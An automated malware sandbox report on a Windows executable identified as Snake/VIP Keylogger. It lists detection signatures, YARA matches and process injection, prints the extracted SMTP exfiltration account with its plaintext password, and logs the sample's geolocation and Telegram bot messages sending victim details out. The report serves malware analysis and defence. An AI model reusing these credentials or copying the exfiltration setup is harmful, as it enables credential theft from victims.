Edit tour

Windows Analysis Report
114117914 - Rebound Electronics.exe

Overview

General Information

Sample name:	114117914 - Rebound Electronics.exe
Analysis ID:	1559211
MD5:	f336089abf758f7bb565ebd1366e2ad2
SHA1:	3e5ee53a5014900cef867428b99d92567669bf7f
SHA256:	69e4226931e9735180c32894ac2e0604fc2c9e820781d3fc79b96451ca738072
Tags:	exeuser-lowmal3
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Yara detected Generic Downloader

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evaded block containing many API calls

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Outbound SMTP Connections

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

114117914 - Rebound Electronics.exe (PID: 7496 cmdline: "C:\Users\user\Desktop\114117914 - Rebound Electronics.exe" MD5: F336089ABF758F7BB565EBD1366E2AD2)

RegSvcs.exe (PID: 7520 cmdline: "C:\Users\user\Desktop\114117914 - Rebound Electronics.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "panta@panta.gda.pl", "Password": "PANTA#Gda$2023", "Host": "panta.home.pl", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "panta@panta.gda.pl", "Password": "PANTA#Gda$2023", "Host": "panta.home.pl", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.4130425845.00000000030B4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000001.00000002.4129575492.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.4129575492.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000001.00000002.4129575492.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000001.00000002.4129575492.0000000000402000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d553:$a1: get_encryptedPassword 0x2d870:$a2: get_encryptedUsername 0x2d363:$a3: get_timePasswordChanged 0x2d46c:$a4: get_passwordField 0x2d569:$a5: set_encryptedPassword 0x2ec26:$a7: get_logins 0x2eb89:$a10: KeyLoggerEventArgs 0x2e7ee:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d753:$a1: get_encryptedPassword 0x2da70:$a2: get_encryptedUsername 0x2d563:$a3: get_timePasswordChanged 0x2d66c:$a4: get_passwordField 0x2d769:$a5: set_encryptedPassword 0x2ee26:$a7: get_logins 0x2ed89:$a10: KeyLoggerEventArgs 0x2e9ee:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b54c:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3abef:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ae4c:$a4: \Orbitum\User Data\Default\Login Data 0x3b82b:$a5: \Kometa\User Data\Default\Login Data
00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e36a:$s1: UnHook 0x2e371:$s2: SetHook 0x2e379:$s3: CallNextHook 0x2e386:$s4: _hook
00000001.00000002.4130425845.000000000303D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.4130425845.0000000002F31000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: 114117914 - Rebound Electronics.exe PID: 7496	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 114117914 - Rebound Electronics.exe PID: 7496	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: 114117914 - Rebound Electronics.exe PID: 7496	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: 114117914 - Rebound Electronics.exe PID: 7496	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x242778:$a1: get_encryptedPassword 0x242a8b:$a2: get_encryptedUsername 0x242592:$a3: get_timePasswordChanged 0x24269b:$a4: get_passwordField 0x24278e:$a5: set_encryptedPassword 0x244c3a:$a7: get_logins 0x244b9d:$a10: KeyLoggerEventArgs 0x244806:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegSvcs.exe PID: 7520	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7520	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: RegSvcs.exe PID: 7520	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 7520	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xe6fd9:$a1: get_encryptedPassword 0xe72ec:$a2: get_encryptedUsername 0xe6df3:$a3: get_timePasswordChanged 0xe6efc:$a4: get_passwordField 0xe6fef:$a5: set_encryptedPassword 0xe949b:$a7: get_logins 0xe93fe:$a10: KeyLoggerEventArgs 0xe9067:$a11: KeyLoggerEventArgsEventHandler
Click to see the 17 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
1.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.RegSvcs.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d753:$a1: get_encryptedPassword 0x2da70:$a2: get_encryptedUsername 0x2d563:$a3: get_timePasswordChanged 0x2d66c:$a4: get_passwordField 0x2d769:$a5: set_encryptedPassword 0x2ee26:$a7: get_logins 0x2ed89:$a10: KeyLoggerEventArgs 0x2e9ee:$a11: KeyLoggerEventArgsEventHandler
1.2.RegSvcs.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b54c:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3abef:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ae4c:$a4: \Orbitum\User Data\Default\Login Data 0x3b82b:$a5: \Kometa\User Data\Default\Login Data
1.2.RegSvcs.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e36a:$s1: UnHook 0x2e371:$s2: SetHook 0x2e379:$s3: CallNextHook 0x2e386:$s4: _hook
0.2.114117914 - Rebound Electronics.exe.3de0000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.114117914 - Rebound Electronics.exe.3de0000.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.114117914 - Rebound Electronics.exe.3de0000.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.114117914 - Rebound Electronics.exe.3de0000.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2b953:$a1: get_encryptedPassword 0x2bc70:$a2: get_encryptedUsername 0x2b763:$a3: get_timePasswordChanged 0x2b86c:$a4: get_passwordField 0x2b969:$a5: set_encryptedPassword 0x2d026:$a7: get_logins 0x2cf89:$a10: KeyLoggerEventArgs 0x2cbee:$a11: KeyLoggerEventArgsEventHandler
0.2.114117914 - Rebound Electronics.exe.3de0000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3974c:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38def:$a3: \Google\Chrome\User Data\Default\Login Data 0x3904c:$a4: \Orbitum\User Data\Default\Login Data 0x39a2b:$a5: \Kometa\User Data\Default\Login Data
0.2.114117914 - Rebound Electronics.exe.3de0000.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2c56a:$s1: UnHook 0x2c571:$s2: SetHook 0x2c579:$s3: CallNextHook 0x2c586:$s4: _hook
0.2.114117914 - Rebound Electronics.exe.3de0000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.114117914 - Rebound Electronics.exe.3de0000.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.114117914 - Rebound Electronics.exe.3de0000.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.114117914 - Rebound Electronics.exe.3de0000.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.114117914 - Rebound Electronics.exe.3de0000.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d753:$a1: get_encryptedPassword 0x2da70:$a2: get_encryptedUsername 0x2d563:$a3: get_timePasswordChanged 0x2d66c:$a4: get_passwordField 0x2d769:$a5: set_encryptedPassword 0x2ee26:$a7: get_logins 0x2ed89:$a10: KeyLoggerEventArgs 0x2e9ee:$a11: KeyLoggerEventArgsEventHandler
0.2.114117914 - Rebound Electronics.exe.3de0000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b54c:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3abef:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ae4c:$a4: \Orbitum\User Data\Default\Login Data 0x3b82b:$a5: \Kometa\User Data\Default\Login Data
0.2.114117914 - Rebound Electronics.exe.3de0000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e36a:$s1: UnHook 0x2e371:$s2: SetHook 0x2e379:$s3: CallNextHook 0x2e386:$s4: _hook
Click to see the 15 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 188.128.134.93, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 7520, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49754

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T10:12:06.614498+0100	2803305	3	Unknown Traffic	192.168.2.4	49732	188.114.97.3	443	TCP
2024-11-20T10:12:08.890349+0100	2803305	3	Unknown Traffic	192.168.2.4	49734	188.114.97.3	443	TCP
2024-11-20T10:12:13.120641+0100	2803305	3	Unknown Traffic	192.168.2.4	49738	188.114.97.3	443	TCP
2024-11-20T10:12:14.805825+0100	2803305	3	Unknown Traffic	192.168.2.4	49740	188.114.97.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T10:12:03.712534+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49730	132.226.247.73	80	TCP
2024-11-20T10:12:05.931334+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49730	132.226.247.73	80	TCP
2024-11-20T10:12:08.322055+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49733	132.226.247.73	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000001.00000002.4129575492.0000000000402000.00000040.80000000.00040000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "panta@panta.gda.pl", "Password": "PANTA#Gda$2023", "Host": "panta.home.pl", "Port": "587", "Version": "4.4"}
Source: 1.2.RegSvcs.exe.400000.0.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "panta@panta.gda.pl", "Password": "PANTA#Gda$2023", "Host": "panta.home.pl", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for submitted file

Source: 114117914 - Rebound Electronics.exe

ReversingLabs: Detection: 31%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for sample

Source: 114117914 - Rebound Electronics.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: 114117914 - Rebound Electronics.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49752 version: TLS 1.2

Source:	Binary string: wntdll.pdbUGP source: 114117914 - Rebound Electronics.exe, 00000000.00000003.1682638458.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, 114117914 - Rebound Electronics.exe, 00000000.00000003.1687466732.0000000004270000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 114117914 - Rebound Electronics.exe, 00000000.00000003.1682638458.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, 114117914 - Rebound Electronics.exe, 00000000.00000003.1687466732.0000000004270000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C66CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00C66CA9
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C660DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_00C660DD
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C663F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_00C663F9
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C6EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00C6EB60
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C6F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00C6F5FA
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C6F56F FindFirstFileW,FindClose,	0_2_00C6F56F
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C71B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00C71B2F
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C71C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00C71C8A
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C71F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00C71F94

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 015CF45Dh	1_2_015CF2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 015CF45Dh	1_2_015CF52F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 015CF45Dh	1_2_015CF4AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 015CFC19h	1_2_015CF961
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05AC9280h	1_2_05AC8FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05AC7EB5h	1_2_05AC7B78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05AC18A1h	1_2_05AC15F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05AC0FF1h	1_2_05AC0D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05ACE816h	1_2_05ACE548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05ACC826h	1_2_05ACC558
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05AC6733h	1_2_05AC6488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05AC0741h	1_2_05AC0498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05ACDEF6h	1_2_05ACDC28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05ACBF06h	1_2_05ACBC38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05AC3709h	1_2_05AC3460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05ACBA76h	1_2_05ACB7A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05ACFA56h	1_2_05ACF788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05AC5A29h	1_2_05AC5780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05ACDA66h	1_2_05ACD798
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05AC79C9h	1_2_05AC7720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05AC2A01h	1_2_05AC2758
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05AC2151h	1_2_05AC1EA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05AC5179h	1_2_05AC4ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05AC48C9h	1_2_05AC4620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05ACF136h	1_2_05ACEE68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05ACD146h	1_2_05ACCE78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05AC7119h	1_2_05AC6E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05AC1449h	1_2_05AC11A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05ACCCB6h	1_2_05ACC9E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05ACECA6h	1_2_05ACE9D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05ACE386h	1_2_05ACE0B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov esp, ebp	1_2_05ACB081
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov esp, ebp	1_2_05ACB090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05AC0B99h	1_2_05AC08F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05ACC396h	1_2_05ACC0C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05AC62D9h	1_2_05AC6030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05AC32B1h	1_2_05AC3008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05AC02E9h	1_2_05AC0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05AC2E59h	1_2_05AC2BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05AC5E81h	1_2_05AC5BD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05AC55D1h	1_2_05AC5328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05ACD5D6h	1_2_05ACD308
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05AC25A9h	1_2_05AC2300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05ACB5E6h	1_2_05ACB318
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05ACF5C6h	1_2_05ACF2F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05AC7571h	1_2_05AC72C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05AC6CC1h	1_2_05AC6A18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05AC4D21h	1_2_05AC4A78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05AC1CF9h	1_2_05AC1A50

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.114117914 - Rebound Electronics.exe.3de0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: global traffic

TCP traffic: 192.168.2.4:49754 -> 188.128.134.93:587

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20and%20Time:%2020/11/2024%20/%2021:02:20%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20899552%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
